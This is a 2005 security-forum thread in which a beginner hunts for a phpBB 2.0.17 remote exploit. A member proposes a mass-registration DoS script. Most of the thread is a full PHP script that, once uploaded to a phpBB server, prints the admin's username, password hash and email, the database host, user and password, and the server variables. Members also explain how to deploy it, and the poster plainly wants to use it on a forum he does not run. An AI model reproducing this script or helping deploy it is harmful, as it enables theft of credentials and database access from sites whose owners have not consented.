 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 63
 Members: 0
 Total: 63
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
exploit phpBB 2.0.17 |
|
 Posted: Sun Oct 16, 2005 4:21 pm |
 |
|
| Jolsch |
| Beginner |
 |
|
| Joined: Oct 16, 2005 |
| Posts: 3 |
|
|
|
 |
|
 |
|
Could cb tell me where to find or where to search a phpBB 2.0.17 remote exploit??? because I've been searching a whole day and i could'nt find one...  
would be nice thx.... |
|
|
|
|
| Posted: Sun Oct 16, 2005 6:51 pm |
|
|
| Chb |
| Valuable expert |
 |
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
| Maybe there is no public exploit for version 2.0.17 because it's the newest? |
|
|
|
|
| Posted: Mon Oct 17, 2005 4:21 am |
|
|
| shai-tan |
| Valuable expert |
 |
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
There are no public exploits for phpBB 2.0.17 currently.
If there is no registration confirmation code on the register page you could use a DoS sploit that makes thousands of users.  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Mon Oct 17, 2005 2:32 pm |
|
|
| Jolsch |
| Beginner |
|
|
| Joined: Oct 16, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
And could anyone tell me what and how i got to use this script?
<?php
define('IN_PHPBB', true);
$phpbb_root_path = '';
include($phpbb_root_path . '/extension.inc');
include($phpbb_root_path . '/db/mysql.'.$phpEx);
include($phpbb_root_path . '/common.'.$phpEx);
?>
<b><h2>Do Not Worry About the Errors Above. The Information you Want is below  </h2></b>
<h4>
Admin Forum Information: </h4>
<?php
$uid = '2';
$sql = "SELECT user_id, username, user_password, user_email
FROM ". USERS_TABLE ."
WHERE user_id = $uid";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql);
}
echo "<table>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "\t<tr>\n";
foreach ($line as $col_value)
{
echo "\t\t<td> $col_value </td>\n";
}
echo "\t<tr>\n";
}
echo "</table>\n";
?>
<h4>
Database Information:<br/></h4>
Database Type = <?php echo $dbms;?><br/>
DB Host = <?php echo $dbhost;?><br/>
DB Name = <?php echo $dbname;?><br/>
DB User = <?php echo $dbuser;?><br/>
DB Password = <?php echo $dbpasswd;?><br/>
DB Table Prefix = <?php echo $table_prefix;?><br/>
<p>
<p>
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />";
print "This page is called ".$_SERVER["PHP_SELF"]; ?>
<p>
<p>
<p>
<p>
<h4>And here is a load of useful info</h4></p>
<?php
print_r($_SERVER);
?>
<p>
<p>
<?php
print $_SERVER[""];#Built in Variable name
?>
I already read how to do but in the forum i want to use it it says that the folder is empty..... ..
Thx jolsch |
|
|
|
|
|
|
|
|
| Posted: Mon Oct 17, 2005 5:40 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
lolz I wrote that. It has to be on the server with the forums. Then you goto the url. Uploading it is the problem. It was part of my early testing  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Wed Oct 19, 2005 2:06 pm |
|
|
| Jolsch |
| Beginner |
|
|
| Joined: Oct 16, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
The problem is that this thing doesnt work!
I dont know wyh cause i dint do ''php-things'' usually....but now i need it....
I already began to learn but ...takes time...
The forum i want to use it in says that the file is empty...why
pls help me....
jolsch |
|
|
|
|
| Posted: Wed Oct 19, 2005 6:07 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
That is not an exploit. That was for testing back in my early days and it does work when you use it right.
2.0.17 has no public vulns. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Sun Oct 23, 2005 5:34 pm |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Oct 23, 2005 10:37 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Its not really an exploit its more of a vuln. Its quite simple and thats why the phpbb team haven't released 2.0.18. But if you want the latest updates to your forum use the phpbb CVS where you can also download 2.1 (the unstable version of 3.0)
http://area51.phpbb.com/cvs |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Mon Oct 24, 2005 12:29 am |
|
|
| WaterBird |
| Active user |
|
|
| Joined: May 16, 2005 |
| Posts: 37 |
|
|
|
|
|
|
|
| hehe thx but i am not using phpbb anymore :} Just asking But thx ! o_0 |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
